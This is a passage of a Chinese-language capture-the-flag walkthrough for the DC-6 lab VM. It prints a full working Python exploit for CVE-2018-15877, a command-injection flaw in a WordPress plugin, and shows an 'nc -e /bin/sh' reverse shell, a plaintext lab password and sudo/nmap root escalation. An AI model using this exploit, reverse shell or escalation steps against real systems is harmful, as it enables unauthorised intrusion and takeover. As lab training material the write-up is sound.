WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)           | https://www.exploit-db.com/exploits/50110
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
Papers: No Results

发现4个可以利用的漏洞脚本。

┌──(root?kali)-[/home/kali]
└─# searchsploit -x php/webapps/50110.pyExploit: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)URL: https://www.exploit-db.com/exploits/50110Path: /usr/share/exploitdb/exploits/php/webapps/50110.pyCodes: CVE-2018-15877Verified: False
File Type: Python script, Unicode text, UTF-8 text executable

3.4.4 查看poc文件

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cp /usr/share/exploitdb/exploits/php/webapps/50110.py poc.py┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat poc.py                                                  
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28  whoami
www-data
www-data@192.168.101.28  pwd
/var/www/html/wp-admin
www-data@192.168.101.28  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""import requests
from bs4 import BeautifulSoupdef exploit(whoami, ip):while 1:cmd = input(whoami+"@"+ip+"  ")url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'payload = "google.com.tr | " + cmddata = {'ip': payload , 'lookup' : 'lookup' }x = requests.post(url, data = data, cookies=getCookie(ip))html_doc = x.text.split("<p>Output from dig: </p>")[1]soup = BeautifulSoup(html_doc, 'html.parser')print(soup.p.text)def poc(ip):url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }x = requests.post(url, data = myobj, cookies=getCookie(ip))html_doc = x.text.split("<p>Output from dig: </p>")[1]soup = BeautifulSoup(html_doc, 'html.parser')print("[*] Perfect! ")exploit(soup.p.text, ip)def getCookie(ip):url = 'http://' + ip + '/wp-login.php'#log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}x = requests.post(url, data = data)cookies = {}cookie = str(x.headers["Set-Cookie"])for i in cookie.split():if(i.find("wordpress") != -1 and i.find("=") != -1):cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]return cookiesip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)

该poc文件中已经说明使用方法

3.4.5 运行poc文件

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# python poc.py              
What's your target IP?
192.168.6.157
What's your username?
mark
What's your password?
helpdesk01
[*] Please wait...
[*] Perfect! 
www-data@192.168.6.157

3.4.6 反弹shell

3.4.6.1 kali监听6666端口

┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666                      
listening on [any] 6666 ...

3.4.6.2 反弹shell

运行poc.py后的终端：

www-data@192.168.6.157  nc -e /bin/sh 192.168.6.66 6666

3.4.6.3 调用标准终端

┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666                      
listening on [any] 6666 ...
connect to [192.168.6.66] from wordy [192.168.6.157] 56862
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-6:/var/www/html/wp-admin$

调用标准终端成功。

3.4.7 尝试suid提权

寻找有SUID权限（4000）的文件，不显示其他的错误信息：

www-data@dc-6:/var/www/html/wp-admin$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
www-data@dc-6:/var/www/html/wp-admin$

无果。

3.4.8 更多系统信息

在/home/mark/stuff文件发现graham账号的用户信息。

www-data@dc-6:/var/www/html/wp-admin$ cd /home
cd /home
www-data@dc-6:/home$ ls
ls
graham	jens  mark  sarah
www-data@dc-6:/home$ cd mark
cd mark
www-data@dc-6:/home/mark$ ls
ls
stuff
www-data@dc-6:/home/mark$ cd stuff
cd stuff
www-data@dc-6:/home/mark/stuff$ ls
ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat th*
cat th*
Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

获得账号信息：

序号	用户名	密码
1	graham	GSo7isUM1D4

3.5 graham用户相关

3.5.1 切换graham用户

www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4graham@dc-6:/home/mark/stuff$

登录graham用户成功

3.5.2 再次尝试sudo提权

graham@dc-6:/home/mark/stuff$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh

发现/home/jens/backups.sh

3.5.3 bash写入backups.sh

graham@dc-6:/home/jens$ echo "/bin/bash" >> backups.sh
echo "/bin/bash" >> backups.sh
graham@dc-6:/home/jens$

3.6 jens用户相关

3.6.1 切换jens用户

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
sudo -u jens ./backups.sh
tar: Removing leading `/' from member names
jens@dc-6:~$

切换jens用户成功。

3.6.2 查看suid可执行的命令

jens@dc-6:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
jens@dc-6:~$

3.6.3 查看sudo可执行的命令

sudo -l
Matching Defaults entries for jens on dc-6:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap

发现可执行的sudo命令：/usr/bin/nmap

3.7 nmap提权

3.7.1 创建shell.nse文件

jens@dc-6:~$ echo 'os.execute("/bin/bash")' > shell.nse
echo 'os.execute("/bin/bash")' > shell.nse
jens@dc-6:~$ ls
ls
backups.sh  backups.tar.gz  shell.nse
jens@dc-6:~$

3.7.2 执行shell.nse文件

jens@dc-6:~$ sudo -u root nmap --script=shell.nse
sudo -u root nmap --script=shell.nseStarting Nmap 7.40 ( https://nmap.org ) at 2024-05-29 22:52 AEST
root@dc-6:/home/jens#

千难万难终于取得root权限，O(∩_∩)O哈哈~

3.7.3 查看flag

root@dc-6:/home/jens# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
root@dc-6:/home/jens# cat /root/theflag.txtYb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) Congratulations!!!Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.